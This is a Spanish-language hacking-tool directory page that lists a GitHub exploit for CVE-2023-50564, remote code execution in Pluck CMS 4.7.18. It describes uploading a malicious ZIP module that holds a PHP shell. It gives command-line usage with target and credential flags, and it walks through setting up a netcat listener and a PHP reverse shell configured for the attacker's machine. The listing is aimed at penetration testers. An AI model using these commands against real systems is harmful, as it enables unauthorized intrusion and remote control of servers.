Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-50564 — Pluck v4.7.18 - Ejecución Remota de Código (RCE) | Kitploit
Herramientas/GitHubGitHub/glynzr/cve-2023-50564
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubglynzr/cve-2023-50564

CVE-2023-50564

Pluck v4.7.18 - Ejecución Remota de Código (RCE)

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-50564

📌 Descripción

Este exploit permite a un administrador autenticado en Pluck CMS v4.7.18 cargar un módulo ZIP malicioso que contiene un shell PHP, resultando en ejecución remota de código (RCE).


⚙️ Características

  • Autentica en el objetivo usando un nombre de usuario y contraseña válidos
  • Crea automáticamente un archivo ZIP a partir de un archivo PHP proporcionado
  • Sube el módulo al endpoint vulnerable installmodule
  • Ejecuta el payload y muestra la salida
  • Soporta objetivo, puerto, credenciales y ruta del shell personalizados

🚀 Uso

root@kitploit:~
git clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt

python3 exploit.py -h
root@kitploit:~
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
  • El puerto es opcional y por defecto es 80 si no se especifica.
  • Al especificar el objetivo, se requiere la dirección IP o nombre de dominio (por ejemplo, 127.0.0.1 o test.domain).
Descargar herramienta

Ejemplo de explotación

Primero, se debe iniciar el listener de reverse shell en la máquina atacante (esta pestaña del terminal no debe cerrarse):

root@kitploit:~
nc -nvlp <specify port>

Luego, descarga el reverse shell PHP desde https://github.com/pentestmonkey/php-reverse-shell y personalízalo según la máquina atacante. (IP, puerto)

Ejecuta el código del exploit en otra pestaña:

root@kitploit:~
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php